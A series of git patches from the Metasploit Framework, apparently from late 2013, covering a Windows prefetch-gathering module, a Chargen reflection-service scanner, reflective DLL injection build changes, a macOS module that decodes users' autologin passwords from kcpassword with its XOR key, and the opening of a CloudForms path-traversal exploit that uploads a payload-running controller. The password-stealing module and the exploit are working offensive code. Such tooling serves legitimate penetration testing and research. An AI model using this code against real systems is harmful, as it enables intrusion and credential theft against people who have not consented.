Prefetch File Information', 'Description' => %q{ - This module gathers prefetch file information from WinXP, Win2k3 and Win7 systems. - Run count, hash and filename information is collected from each prefetch file while - Last Modified and Create times are file MACE values. + This module gathers prefetch file information from WinXP, Win2k3 and Win7 systems + and current values of related registry keys. From each prefetch file we'll collect + filetime (converted to utc) of the last execution, file path hash, run count, filename + and the execution path. }, 'License' => MSF_LICENSE, - 'Author' => ['TJ Glad '], + 'Author' => ['TJ Glad '], 'Platform' => ['win'], 'SessionType' => ['meterpreter'] )) @@ -43,7 +44,7 @@ class Metasploit3 < Msf::Post end def print_timezone_key_values(key_value) - # Looks for timezone from registry + # Looks for timezone information from registry. timezone = registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation", key_value) tz_bias = registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation", "Bias") if timezone.nil? or tz_bias.nil? @@ -60,36 +61,64 @@ class Metasploit3 < Msf::Post end end - def gather_pf_info(name_offset, hash_offset, runcount_offset, filename) - # We'll load the file and parse information from the offsets + def gather_pf_info(name_offset, hash_offset, runcount_offset, filetime_offset, filename) + # Collects the desired information from each prefetch file found + # from the system. + prefetch_file = read_file(filename) if prefetch_file.empty? or prefetch_file.nil? print_error("Couldn't read file: #{filename}") return nil else - # First we'll get the filename + # First we extract the saved filename pf_filename = prefetch_file[name_offset..name_offset+60] idx = pf_filename.index("\x00\x00") name = Rex::Text.to_ascii(pf_filename.slice(0..idx)) - # Next we'll get the run count + + # Then we get the runcount run_count = prefetch_file[runcount_offset..runcount_offset+4].unpack('L*')[0].to_s - # Then file path hash + + # Then the filepath hash path_hash = prefetch_file[hash_offset..hash_offset+4].unpack('h8')[0].reverse.upcase.to_s - # Last is mace value for timestamps - mtimes = client.priv.fs.get_file_mace(filename) - if mtimes.nil? or mtimes.empty? - last_modified = "Error reading value" - created = "Error reading value" - else - last_modified = mtimes['Modified'].utc.to_s - created = mtimes['Created'].utc.to_s + + # Last we get the latest execution time + filetime_a = prefetch_file[filetime_offset..(filetime_offset+16)].unpack('q32') + filetime = filetime_a[0] + filetime_a[1] + last_exec = Time.at((filetime - 116444736000000000) / 10000000).utc.to_s + + # This is for reading file paths of the executable from + # the prefetch file. We'll use this to find out from where the + # file was executed. + # First we'll use specific offsets for finding out the location + # and length of the filepath. + filepath = [] + fpath_offset = prefetch_file[0x64..0x68].unpack('h4')[0].reverse.to_i(16) + fpath_length = prefetch_file[0x68..0x6C].unpack('h4')[0].reverse.to_i(16) + filepath_data = prefetch_file[fpath_offset..(fpath_offset+fpath_length)] + if not filepath_data.nil? or not filepath_data.empty? + r_filename = name.gsub(/\0/, '') + fpath_data_array = filepath_data.split("\x00\x00\x00") + fpath_data_array.each do |path| + fpath_full_file = path.split("\\") + fpath_file = fpath_full_file.last + if not fpath_file.nil? + fpath_fname = fpath_file.gsub(/\0/, '') + if r_filename == fpath_fname + fpath_path = path.gsub(/\0/, '') + if not fpath_path.empty? + filepath = fpath_path + end + end + end + end end - return [last_modified, created, run_count, path_hash, name] end + return [last_exec, path_hash, run_count, name, filepath] end def run print_status("Prefetch Gathering started.") + # Check to see what Windows Version is running. # Needed for offsets. # Tested on WinXP, Win2k3 and Win7 systems. @@ -100,18 +129,18 @@ class Metasploit3 < Msf::Post error_msg = "You don't have enough privileges. Try getsystem." if sysnfo =~/(Windows XP|2003|.NET)/ - # For some reason we need system privileges to read file - # mace time on XP/2003 while we can do the same only - # as admin on Win7. - if not is_system? + + if not is_admin? print_error(error_msg) return nil end + # Offsets for WinXP & Win2k3 print_good("Detected #{sysnfo} (max 128 entries)") name_offset = 0x10 hash_offset = 0x4C runcount_offset = 0x90 + filetime_offset = 0x78 # Registry key for timezone key_value = "StandardName" @@ -120,14 +149,15 @@ class Metasploit3 < Msf::Post print_error(error_msg) return nil end + # Offsets for Win7 print_good("Detected #{sysnfo} (max 128 entries)") name_offset = 0x10 hash_offset = 0x4C runcount_offset = 0x98 + filetime_offset = 0x78 # Registry key for timezone key_value = "TimeZoneKeyName" - else print_error("No offsets for the target Windows version. Currently works only on WinXP, Win2k3 and Win7.") return nil @@ -138,12 +168,13 @@ class Metasploit3 < Msf::Post 'Indent' => 1, 'Columns' => [ - "Modified (mace)", - "Created (mace)", + "Last execution (filetime)", "Run Count", "Hash", - "Filename" + "Filename", + "Filepath" ]) + print_prefetch_key_value print_timezone_key_values(key_value) print_good("Current UTC Time: %s" % Time.now.utc) @@ -165,7 +196,7 @@ class Metasploit3 < Msf::Post next else filename = ::File.join(file['path'], file['name']) - pf_entry = gather_pf_info(name_offset, hash_offset, runcount_offset, filename) + pf_entry = gather_pf_info(name_offset, hash_offset, runcount_offset, filetime_offset, filename) if not pf_entry.nil? table << pf_entry end From b2e7ff45877e3abc4def2fdf8f85d20db88ce161 Mon Sep 17 00:00:00 2001 From: jiuweigui Date: Sun, 17 Nov 2013 22:26:30 +0200 Subject: [PATCH 009/205] Small change for filetime conversion --- modules/post/windows/gather/enum_prefetch.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/gather/enum_prefetch.rb b/modules/post/windows/gather/enum_prefetch.rb index c7436fac8d..b97e80bfe6 100644 --- a/modules/post/windows/gather/enum_prefetch.rb +++ b/modules/post/windows/gather/enum_prefetch.rb @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Post path_hash = prefetch_file[hash_offset..hash_offset+4].unpack('h8')[0].reverse.upcase.to_s # Last we get the latest execution time - filetime_a = prefetch_file[filetime_offset..(filetime_offset+16)].unpack('q32') + filetime_a = prefetch_file[filetime_offset..(filetime_offset+16)].unpack('q*') filetime = filetime_a[0] + filetime_a[1] last_exec = Time.at((filetime - 116444736000000000) / 10000000).utc.to_s From f3b907537c779e323f61335afb37c2f251a93c86 Mon Sep 17 00:00:00 2001 From: Matteo Cantoni Date: Sat, 23 Nov 2013 17:17:24 +0100 Subject: [PATCH 010/205] Module to identifies open Chargen service --- .../scanner/chargen/chargen_probe.rb | 87 +++++++++++++++++++ 1 file changed, 87 insertions(+) create mode 100644 modules/auxiliary/scanner/chargen/chargen_probe.rb diff --git a/modules/auxiliary/scanner/chargen/chargen_probe.rb b/modules/auxiliary/scanner/chargen/chargen_probe.rb new file mode 100644 index 0000000000..62c3c3743a --- /dev/null +++ b/modules/auxiliary/scanner/chargen/chargen_probe.rb @@ -0,0 +1,87 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + Rank = ManualRanking + + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + include Msf::Exploit::Remote::Udp + + def initialize + super( + 'Name' => 'Identifies Open Chargen Service Checking The Answer.', + 'Description' => %q{ + Chargen is a debugging and measurement tool and a character + generator service. A character generator service simply sends + data without regard to the input. + Chargen is susceptible to spoofing the source of transmissions + as well as use in a reflection attack vector. The misuse of the + testing features of the Chargen service may allow attackers to + craft malicious network payloads and reflect them by spoofing + the transmission source to effectively direct it to a target. + This can result in traffic loops and service degradation with + large amounts of network traffic. + }, + 'Author' => 'Matteo Cantoni ', + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', 'CVE-1999-0103' ], + [ 'URL', 'https://www.cert.be/pro/docs/chargensnmp-ddos-attacks-rise' ], + [ 'URL', 'http://tools.ietf.org/html/rfc864' ], + ], + 'DisclosureDate' => 'Feb 08 1996') + + register_options([ + Opt::RPORT(19), + OptInt.new('TIMEOUT', [true, 'Timeout for the Chargen probe', 5]), + ]) + + register_advanced_options([ + OptBool.new('DEBUG', [false, 'Show chargen server answer', false]), + ], self.class) + + deregister_options('PASSWORD','RHOST','USERNAME') + end + + def to + return 5 if datastore['TIMEOUT'].to_i.zero? + datastore['TIMEOUT'].to_i + end + + def run_host(rhost) + begin + ::Timeout.timeout(to) do + connect_udp + pkt = Rex::Text.rand_text_alpha_lower(1) + req = udp_sock.write(pkt) + + while (res = udp_sock.recvfrom(65535,0.1) and res[1]) + + if (datastore['DEBUG']) + print_status("DEBUG: #{res.to_s}") + end + + res = res.to_s.strip.upcase + if (res.match(/ABCDEFGHIJKLMNOPQRSTUVWXYZ/i) or res(/0123456789/)) + print_good("#{rhost}:#{rport} answers with #{res.length} bytes (headers + UDP payload)") + report_service(:host => rhost, :port => rport, :name => "chargen", :info => res.length) + end + end + + disconnect_udp + end + rescue ::Rex::ConnectionError + rescue Timeout::Error + print_error("#{rhost}:#{rport} server timed out after #{to} seconds. Skipping.") + rescue ::Exception => e + print_error("#{e} #{e.backtrace}") + end + end +end From 5ebbf8061f46fb7ebb550b1b4052c75a958a89d8 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Sat, 23 Nov 2013 19:22:17 +0000 Subject: [PATCH 011/205] Use Rapid7 Fork --- .gitmodules | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.gitmodules b/.gitmodules index 0137af2ab8..4407c1c430 100644 --- a/.gitmodules +++ b/.gitmodules @@ -1,3 +1,3 @@ [submodule "external/source/ReflectiveDLLInjection"] path = external/source/ReflectiveDLLInjection - url = git://github.com/stephenfewer/ReflectiveDLLInjection.git + url = git://github.com/rapid7/ReflectiveDLLInjection.git From 3111aee8667400b6ee1a511dcf32c020d006c720 Mon Sep 17 00:00:00 2001 From: Matteo Cantoni Date: Tue, 26 Nov 2013 21:42:09 +0100 Subject: [PATCH 012/205] fix match and boolean expression --- modules/auxiliary/scanner/chargen/chargen_probe.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/chargen/chargen_probe.rb b/modules/auxiliary/scanner/chargen/chargen_probe.rb index 62c3c3743a..21e347c836 100644 --- a/modules/auxiliary/scanner/chargen/chargen_probe.rb +++ b/modules/auxiliary/scanner/chargen/chargen_probe.rb @@ -62,14 +62,14 @@ class Metasploit3 < Msf::Auxiliary pkt = Rex::Text.rand_text_alpha_lower(1) req = udp_sock.write(pkt) - while (res = udp_sock.recvfrom(65535,0.1) and res[1]) + while ((res = udp_sock.recvfrom(65535,0.1)) && (res[1])) if (datastore['DEBUG']) print_status("DEBUG: #{res.to_s}") end - res = res.to_s.strip.upcase - if (res.match(/ABCDEFGHIJKLMNOPQRSTUVWXYZ/i) or res(/0123456789/)) + res = res.to_s.strip + if (res.match(/ABCDEFGHIJKLMNOPQRSTUVWXYZ/i) || res.match(/0123456789/)) print_good("#{rhost}:#{rport} answers with #{res.length} bytes (headers + UDP payload)") report_service(:host => rhost, :port => rport, :name => "chargen", :info => res.length) end From 6edd9aa736bd9971b8a283ecc8d3c0ef74416694 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Sat, 30 Nov 2013 20:12:08 +0000 Subject: [PATCH 013/205] Update for new ReflectiveDLL Submodule --- .../source/exploits/cve-2013-3660/Readme.md | 71 ------------------- .../cve-2013-3660/dll/reflective_dll.vcxproj | 6 +- external/source/vncdll/loader/loader.vcproj | 10 +-- 3 files changed, 8 insertions(+), 79 deletions(-) delete mode 100755 external/source/exploits/cve-2013-3660/Readme.md mode change 100755 => 100644 external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj diff --git a/external/source/exploits/cve-2013-3660/Readme.md b/external/source/exploits/cve-2013-3660/Readme.md deleted file mode 100755 index 8670897457..0000000000 --- a/external/source/exploits/cve-2013-3660/Readme.md +++ /dev/null @@ -1,71 +0,0 @@ -About -===== - -Reflective DLL injection is a library injection technique in which the concept -of reflective programming is employed to perform the loading of a library from -memory into a host process. As such the library is responsible for loading -itself by implementing a minimal Portable Executable (PE) file loader. It can -then govern, with minimal interaction with the host system and process, how it -will load and interact with the host. - -Injection works from Windows NT4 up to and including Windows 8, running on x86, -x64 and ARM where applicable. - -Overview -======== - -The process of remotely injecting a library into a process is two fold. Firstly, -the library you wish to inject must be written into the address space of the -target process (Herein referred to as the host process). Secondly the library -must be loaded into that host process in such a way that the library's run time -expectations are met, such as resolving its imports or relocating it to a -suitable location in memory. - -Assuming we have code execution in the host process and the library we wish to -inject has been written into an arbitrary location of memory in the host -process, Reflective DLL Injection works as follows. - -* Execution is passed, either via CreateRemoteThread() or a tiny bootstrap -shellcode, to the library's ReflectiveLoader function which is an exported -function found in the library's export table. -* As the library's image will currently exists in an arbitrary location in -memory the ReflectiveLoader will first calculate its own image's current -location in memory so as to be able to parse its own headers for use later on. -* The ReflectiveLoader will then parse the host processes kernel32.dll export -table in order to calculate the addresses of three functions required by the -loader, namely LoadLibraryA, GetProcAddress and VirtualAlloc. -* The ReflectiveLoader will now allocate a continuous region of memory into -which it will proceed to load its own image. The location is not important as -the loader will correctly relocate the image later on. -The library's headers and sections are loaded into their new locations in -memory. -* The ReflectiveLoader will then process the newly loaded copy of its image's -import table, loading any additional library's and resolving their respective -imported function addresses. -* The ReflectiveLoader will then process the newly loaded copy of its image's -relocation table. -* The ReflectiveLoader will then call its newly loaded image's entry point -function, DllMain with DLL_PROCESS_ATTACH. The library has now been successfully -loaded into memory. -* Finally the ReflectiveLoader will return execution to the initial bootstrap -shellcode which called it, or if it was called via CreateRemoteThread, the -thread will terminate. - -Build -===== - -Open the 'rdi.sln' file in Visual Studio C++ and build the solution in Release -mode to make inject.exe and reflective_dll.dll - -Usage -===== - -To test use the inject.exe to inject reflective_dll.dll into a host process via -a process id, e.g.: - -> inject.exe 1234 - -License -======= - -Licensed under a 3 clause BSD license, please see LICENSE.txt for details. diff --git a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj b/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj old mode 100755 new mode 100644 index d6512e0561..61c50ca373 --- a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj +++ b/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj @@ -109,7 +109,7 @@ false exploit $(VCInstallDir)atlmfc\src\mfc;$(VCInstallDir)atlmfc\src\mfcm;$(VCInstallDir)atlmfc\src\atl;$(VCInstallDir)crt\src;..\..\..\ReflectiveDLLInjection\dll\src\; - $(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(WindowsSDK_IncludePath);..\..\..\ReflectiveDLLInjection\dll\src\; + $(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(WindowsSDK_IncludePath);..\..\..\ReflectiveDLLInjection\common\;..\..\..\ReflectiveDLLInjection\dll\src\; false @@ -118,7 +118,7 @@ $(SolutionDir)$(Platform)\$(Configuration)\ $(Platform)\$(Configuration)\ false - $(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(WindowsSDK_IncludePath);..\..\..\ReflectiveDLLInjection\dll\src\; + $(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(WindowsSDK_IncludePath);..\..\..\ReflectiveDLLInjection\common\;..\..\..\ReflectiveDLLInjection\dll\src\; $(VCInstallDir)atlmfc\src\mfc;$(VCInstallDir)atlmfc\src\mfcm;$(VCInstallDir)atlmfc\src\atl;$(VCInstallDir)crt\src;..\..\..\ReflectiveDLLInjection\dll\src\; @@ -260,7 +260,7 @@ - + diff --git a/external/source/vncdll/loader/loader.vcproj b/external/source/vncdll/loader/loader.vcproj index 4d28833c6a..e6f368f2b4 100644 --- a/external/source/vncdll/loader/loader.vcproj +++ b/external/source/vncdll/loader/loader.vcproj @@ -45,7 +45,7 @@ Name="VCCLCompilerTool" Optimization="0" PreprocessorDefinitions="WIN32;WIN_X86;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;_CRT_SECURE_NO_WARNINGS;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;" - AdditionalIncludeDirectories="..\..\ReflectiveDLLInjection\dll\src\;..\..\ReflectiveDLLInjection\inject\src\;" + AdditionalIncludeDirectories="..\..\..\ReflectiveDLLInjection\common\;..\..\ReflectiveDLLInjection\dll\src\;..\..\ReflectiveDLLInjection\inject\src\;" MinimalRebuild="true" BasicRuntimeChecks="3" RuntimeLibrary="3" @@ -118,7 +118,7 @@ Name="VCCLCompilerTool" Optimization="0" PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;" - AdditionalIncludeDirectories="..\..\ReflectiveDLLInjection\dll\src\;..\..\ReflectiveDLLInjection\inject\src\;" + AdditionalIncludeDirectories="..\..\..\ReflectiveDLLInjection\common\;..\..\ReflectiveDLLInjection\dll\src\;..\..\ReflectiveDLLInjection\inject\src\;" MinimalRebuild="true" BasicRuntimeChecks="3" RuntimeLibrary="3" @@ -193,7 +193,7 @@ Optimization="2" EnableIntrinsicFunctions="true" PreprocessorDefinitions="WIN32;WIN_X86;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;_CRT_SECURE_NO_WARNINGS;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;" - AdditionalIncludeDirectories="..\..\ReflectiveDLLInjection\dll\src\;..\..\ReflectiveDLLInjection\inject\src\;" + AdditionalIncludeDirectories="..\..\..\ReflectiveDLLInjection\common\;..\..\ReflectiveDLLInjection\dll\src\;..\..\ReflectiveDLLInjection\inject\src\;" RuntimeLibrary="0" EnableFunctionLevelLinking="true" UsePrecompiledHeader="0" @@ -278,7 +278,7 @@ Optimization="2" EnableIntrinsicFunctions="true" PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;_CRT_SECURE_NO_WARNINGS;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN" - AdditionalIncludeDirectories="..\..\ReflectiveDLLInjection\dll\src\;..\..\ReflectiveDLLInjection\inject\src\;" + AdditionalIncludeDirectories="..\..\..\ReflectiveDLLInjection\common\;..\..\ReflectiveDLLInjection\dll\src\;..\..\ReflectiveDLLInjection\inject\src\;" RuntimeLibrary="0" EnableFunctionLevelLinking="true" UsePrecompiledHeader="0" @@ -404,7 +404,7 @@ > Date: Thu, 5 Dec 2013 08:56:26 +0200 Subject: [PATCH 014/205] Modifications how info is collected from pf files. --- modules/post/windows/gather/enum_prefetch.rb | 33 ++++++++++++-------- 1 file changed, 20 insertions(+), 13 deletions(-) diff --git a/modules/post/windows/gather/enum_prefetch.rb b/modules/post/windows/gather/enum_prefetch.rb index b97e80bfe6..48817f5ebc 100644 --- a/modules/post/windows/gather/enum_prefetch.rb +++ b/modules/post/windows/gather/enum_prefetch.rb @@ -89,26 +89,33 @@ class Metasploit3 < Msf::Post # This is for reading file paths of the executable from # the prefetch file. We'll use this to find out from where the # file was executed. + # # First we'll use specific offsets for finding out the location - # and length of the filepath. + # and length of the filepath so that we can find it. + filepath = [] fpath_offset = prefetch_file[0x64..0x68].unpack('h4')[0].reverse.to_i(16) fpath_length = prefetch_file[0x68..0x6C].unpack('h4')[0].reverse.to_i(16) filepath_data = prefetch_file[fpath_offset..(fpath_offset+fpath_length)] - if not filepath_data.nil? or not filepath_data.empty? - r_filename = name.gsub(/\0/, '') + + # This part will extract the filepath so that we can find and + # compare its contents to the filename we found previously. This + # allows us to find the filepath used to execute the program + # referenced in the prefetch-file. + + if not filepath_data.nil? or not filepath_data.emtpy? fpath_data_array = filepath_data.split("\x00\x00\x00") fpath_data_array.each do |path| - fpath_full_file = path.split("\\") - fpath_file = fpath_full_file.last - if not fpath_file.nil? - fpath_fname = fpath_file.gsub(/\0/, '') - if r_filename == fpath_fname - fpath_path = path.gsub(/\0/, '') - if not fpath_path.empty? - filepath = fpath_path - end - end + fpath_entry_data = path.split("\\") + fpath_entry_filename = fpath_entry_data.last + if not fpath_entry_filename.nil? + fpath_name = fpath_entry_filename.gsub(/\0/, '') + #r_filename = name.gsub(/\0/, '') + #print_status(fpath_name.inspect) + if name == fpath_name[0..29] + fpath_path = path.gsub(/\0/, '') + filepath = fpath_path + end end end end From 902d48efab36413ae184335416fe2463d61cd5b9 Mon Sep 17 00:00:00 2001 From: jiuweigui Date: Thu, 5 Dec 2013 09:03:42 +0200 Subject: [PATCH 015/205] Delete debug prints --- modules/post/windows/gather/enum_prefetch.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/post/windows/gather/enum_prefetch.rb b/modules/post/windows/gather/enum_prefetch.rb index 48817f5ebc..9886923024 100644 --- a/modules/post/windows/gather/enum_prefetch.rb +++ b/modules/post/windows/gather/enum_prefetch.rb @@ -101,7 +101,8 @@ class Metasploit3 < Msf::Post # This part will extract the filepath so that we can find and # compare its contents to the filename we found previously. This # allows us to find the filepath used to execute the program - # referenced in the prefetch-file. + # referenced in the prefetch-file (among other paths which won't + # be showed though). if not filepath_data.nil? or not filepath_data.emtpy? fpath_data_array = filepath_data.split("\x00\x00\x00") From 717f45ac099f388002ff3731f61713d7d81b99a7 Mon Sep 17 00:00:00 2001 From: jiuweigui Date: Thu, 5 Dec 2013 09:07:28 +0200 Subject: [PATCH 016/205] Minor modification --- modules/post/windows/gather/enum_prefetch.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/post/windows/gather/enum_prefetch.rb b/modules/post/windows/gather/enum_prefetch.rb index 9886923024..e3ae3aff7c 100644 --- a/modules/post/windows/gather/enum_prefetch.rb +++ b/modules/post/windows/gather/enum_prefetch.rb @@ -111,8 +111,6 @@ class Metasploit3 < Msf::Post fpath_entry_filename = fpath_entry_data.last if not fpath_entry_filename.nil? fpath_name = fpath_entry_filename.gsub(/\0/, '') - #r_filename = name.gsub(/\0/, '') - #print_status(fpath_name.inspect) if name == fpath_name[0..29] fpath_path = path.gsub(/\0/, '') filepath = fpath_path From 4cb788b9de81f0c1db4c063cc94e5d32f889cb61 Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Sat, 7 Dec 2013 19:01:35 -0600 Subject: [PATCH 017/205] Adds osx autologin password post module. --- modules/post/osx/gather/autologin_password.rb | 81 +++++++++++++++++++ 1 file changed, 81 insertions(+) create mode 100644 modules/post/osx/gather/autologin_password.rb diff --git a/modules/post/osx/gather/autologin_password.rb b/modules/post/osx/gather/autologin_password.rb new file mode 100644 index 0000000000..af15955e80 --- /dev/null +++ b/modules/post/osx/gather/autologin_password.rb @@ -0,0 +1,81 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Post + include Msf::Post::File + + # extract/verify by by XORing your kcpassword with your password + AUTOLOGIN_XOR_KEY = [0x7D, 0x89, 0x52, 0x23, 0xD2, 0xBC, 0xDD, 0xEA, 0xA3, 0xB9, 0x1F] + + def initialize(info={}) + super(update_info(info, + 'Name' => 'OSX Gather Autologin Password as Root', + 'Description' => %q{ + This module will steal the plaintext password of any user on the machine + with autologin enabled. Root access is required. + + When a user has autologin enabled (System Preferences -> Accounts), OSX + stores their password with an XOR encoding in /private/etc/kcpassword. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'joev' ], + 'Platform' => [ 'osx' ], + 'References' => [ + ['URL', 'http://www.brock-family.org/gavin/perl/kcpassword.html'] + ], + 'SessionTypes' => [ 'shell', 'meterpreter' ] + )) + + register_advanced_options([ + OptString.new('KCPASSWORD_PATH', [true, 'Path to kcpassword file', '/private/etc/kcpassword']) + ], self.class) + end + + def run + # ensure the user is root (or can read the kcpassword) + if not user == 'root' + fail_with "Root privileges required to read kcpassword" + end + + # read the autologin account from prefs plist + autouser = cmd_exec('defaults read /Library/Preferences/com.apple.loginwindow "autoLoginUser" "username"') + if autouser.present? + print_status "User #{autouser} has autologin enabled, decoding password..." + else + fail_with "No users on this machine have autologin enabled." + end + + # kcpass contains the XOR'd bytes + kcpass = read_file(kcpassword_path) + key = AUTOLOGIN_XOR_KEY + + # decoding routing, slices into 11 byte chunks and XOR's each chunk + decoded = kcpass.bytes.to_a.each_slice(key.length).map do |kc| + kc.each_with_index.map { |byte, idx| byte ^ key[idx] }.map(&:chr).join + end.join.sub(/\x00.*$/, '') + + # save in the database + report_auth_info( + :host => session.session_host, + :sname => 'login', + :user => autouser, + :pass => decoded, + :active => true + ) + print_good "Decoded autologin password: #{autouser}:#{decoded}" + end + + private + + def kcpassword_path + datastore['KCPASSWORD_PATH'] + end + + def user + @user ||= cmd_exec('whoami').chomp + end +end From 3066e62711479046f35a354bea6b6e074869b837 Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Sat, 7 Dec 2013 19:27:36 -0600 Subject: [PATCH 018/205] Fix typo, fix no-autologin users bug. --- modules/post/osx/gather/autologin_password.rb | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/modules/post/osx/gather/autologin_password.rb b/modules/post/osx/gather/autologin_password.rb index af15955e80..36c5eeb486 100644 --- a/modules/post/osx/gather/autologin_password.rb +++ b/modules/post/osx/gather/autologin_password.rb @@ -38,22 +38,24 @@ class Metasploit3 < Msf::Post def run # ensure the user is root (or can read the kcpassword) if not user == 'root' - fail_with "Root privileges required to read kcpassword" + fail_with "Root privileges are required to read kcpassword file" end # read the autologin account from prefs plist - autouser = cmd_exec('defaults read /Library/Preferences/com.apple.loginwindow "autoLoginUser" "username"') + read_cmd = "defaults read /Library/Preferences/com.apple.loginwindow autoLoginUser username" + autouser = cmd_exec("/bin/sh -c '#{read_cmd} 2> /dev/null'") + if autouser.present? print_status "User #{autouser} has autologin enabled, decoding password..." else - fail_with "No users on this machine have autologin enabled." + fail_with "No users on this machine have autologin enabled" end # kcpass contains the XOR'd bytes kcpass = read_file(kcpassword_path) key = AUTOLOGIN_XOR_KEY - # decoding routing, slices into 11 byte chunks and XOR's each chunk + # decoding routine, slices into 11 byte chunks and XOR's each chunk decoded = kcpass.bytes.to_a.each_slice(key.length).map do |kc| kc.each_with_index.map { |byte, idx| byte ^ key[idx] }.map(&:chr).join end.join.sub(/\x00.*$/, '') @@ -78,4 +80,8 @@ class Metasploit3 < Msf::Post def user @user ||= cmd_exec('whoami').chomp end + + def all_users + cmd_exec('ls /Users').gsub(//) + end end From 2a0b503f06c0163eaf31953dcd7f9e7d7c7fc4c0 Mon Sep 17 00:00:00 2001 From: jiuweigui Date: Sun, 8 Dec 2013 18:17:22 +0200 Subject: [PATCH 019/205] Minor fix --- modules/post/windows/gather/enum_prefetch.rb | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/modules/post/windows/gather/enum_prefetch.rb b/modules/post/windows/gather/enum_prefetch.rb index e3ae3aff7c..584155976c 100644 --- a/modules/post/windows/gather/enum_prefetch.rb +++ b/modules/post/windows/gather/enum_prefetch.rb @@ -89,10 +89,9 @@ class Metasploit3 < Msf::Post # This is for reading file paths of the executable from # the prefetch file. We'll use this to find out from where the # file was executed. - # + # First we'll use specific offsets for finding out the location # and length of the filepath so that we can find it. - filepath = [] fpath_offset = prefetch_file[0x64..0x68].unpack('h4')[0].reverse.to_i(16) fpath_length = prefetch_file[0x68..0x6C].unpack('h4')[0].reverse.to_i(16) @@ -100,9 +99,9 @@ class Metasploit3 < Msf::Post # This part will extract the filepath so that we can find and # compare its contents to the filename we found previously. This - # allows us to find the filepath used to execute the program - # referenced in the prefetch-file (among other paths which won't - # be showed though). + # allows us to find the filepath (if it can be found inside the + # prefetch file) used to execute the program + # referenced in the prefetch-file. if not filepath_data.nil? or not filepath_data.emtpy? fpath_data_array = filepath_data.split("\x00\x00\x00") From dea35252af06201682b13ef00c2bfff970b3fc83 Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Sun, 8 Dec 2013 14:35:49 -0600 Subject: [PATCH 020/205] Kill unused method. --- modules/post/osx/gather/autologin_password.rb | 4 ---- 1 file changed, 4 deletions(-) diff --git a/modules/post/osx/gather/autologin_password.rb b/modules/post/osx/gather/autologin_password.rb index 36c5eeb486..13ddce9364 100644 --- a/modules/post/osx/gather/autologin_password.rb +++ b/modules/post/osx/gather/autologin_password.rb @@ -80,8 +80,4 @@ class Metasploit3 < Msf::Post def user @user ||= cmd_exec('whoami').chomp end - - def all_users - cmd_exec('ls /Users').gsub(//) - end end From 21661b168b4e6199cfc4a379039bb9870a5fbb9c Mon Sep 17 00:00:00 2001 From: Ramon de C Valle Date: Mon, 9 Dec 2013 16:18:12 -0200 Subject: [PATCH 021/205] Add cfme_manageiq_evm_upload_exec.rb This module exploits a path traversal vulnerability in the "linuxpkgs" action of "agent" controller of the Red Hat CloudForms Management Engine 5.1 (ManageIQ Enterprise Virtualization Manager 5.0 and earlier). --- .../http/cfme_manageiq_evm_upload_exec.rb | 125 ++++++++++++++++++ 1 file changed, 125 insertions(+) create mode 100755 modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb diff --git a/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb b/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb new file mode 100755 index 0000000000..16eb3081ac --- /dev/null +++ b/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb @@ -0,0 +1,125 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit4 < Msf::Exploit::Remote + + include Msf::Exploit::Remote::HttpClient + + def initialize + super( + 'Name' => 'Red Hat CloudForms Management Engine 5.1 agent/linuxpkgs Path Traversal', + 'Description' => %q{ + This module exploits a path traversal vulnerability in the "linuxpkgs" + action of "agent" controller of the Red Hat CloudForms Management Engine 5.1 + (ManageIQ Enterprise Virtualization Manager 5.0 and earlier). + It uploads a fake controller to the controllers directory of the Rails + application with the encoded payload as an action and sends a request to + this action to execute the payload. Optionally, it can also upload a routing + file containing a route to the action. (Which is not necessary, since the + application already contains a general default route.) + }, + 'Author' => 'Ramon de C Valle', + 'License' => MSF_LICENSE, + 